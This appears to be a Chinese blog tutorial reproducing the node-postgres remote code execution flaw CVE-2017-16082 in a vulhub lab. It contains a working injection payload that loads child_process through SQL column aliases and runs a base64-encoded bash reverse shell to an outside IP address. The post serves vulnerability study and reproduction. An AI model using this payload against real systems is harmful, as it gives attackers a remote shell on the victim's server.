1. 首页
  2. 文章中心
  3. vulhub漏洞复现

node-postgres 代码执行漏洞(CVE-2017-16082)

69 阅读 0 评论
我是靠谱客的博主 俏皮小刺猬,这篇文章主要介绍node-postgres 代码执行漏洞(CVE-2017-16082),现在分享给大家,希望可以做个参考。

漏洞原理

请参考这篇文章:https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html

漏洞复现

我这里用的是vulhub的环境,启动环境后,访问http://your-ip:3000/?id=1即可查看到id为1的用户信息,当然id这里存在注入点,我们利用poc来RCE。比如我想执行命令echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyOC85OSAwPiYx|base64 -d|bash,则需要适当分割该字符串,每段不超过64字符,然后替换一下POC:

SELECT 1 AS "']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIu`+/*", 4 AS "*/`MTY4LjMwLjEyOC85OSAwPiYx|base64 -d|bash`)//"

然后将其url编码并发送即可执行命令。

最后

以上就是俏皮小刺猬最近收集整理的关于node-postgres 代码执行漏洞(CVE-2017-16082)的全部内容,更多相关node-postgres内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(46)

相关文章

amf格式需要发哪些信息给服务器,Java AMF3曝远程代码执行漏洞
amf格式需要发哪些信息给服务器,Java AMF3曝远程代码执行漏洞
Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)
Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)
反序列化漏洞-基础篇笔记
反序列化漏洞-基础篇笔记
十多年前的 Adobe ColdFusion 漏洞被用于勒索攻击
十多年前的 Adobe ColdFusion 漏洞被用于勒索攻击
node-postgres 代码执行漏洞(CVE-2017-16082)
node-postgres 代码执行漏洞(CVE-2017-16082)
VMware 警告称 Apache 与 Adobe 存在信息泄露问题
VMware 警告称 Apache 与 Adobe 存在信息泄露问题
rmi反序列化导致rce漏洞修复_记一次Java反序列化漏洞的发现和修复
rmi反序列化导致rce漏洞修复_记一次Java反序列化漏洞的发现和修复
利用Vulnhub复现漏洞 - Nginx越界读取缓存漏洞(CVE-2017-7529)
利用Vulnhub复现漏洞 - Nginx越界读取缓存漏洞(CVE-2017-7529)

评论列表共有 0 条评论

立即
投稿
返回
顶部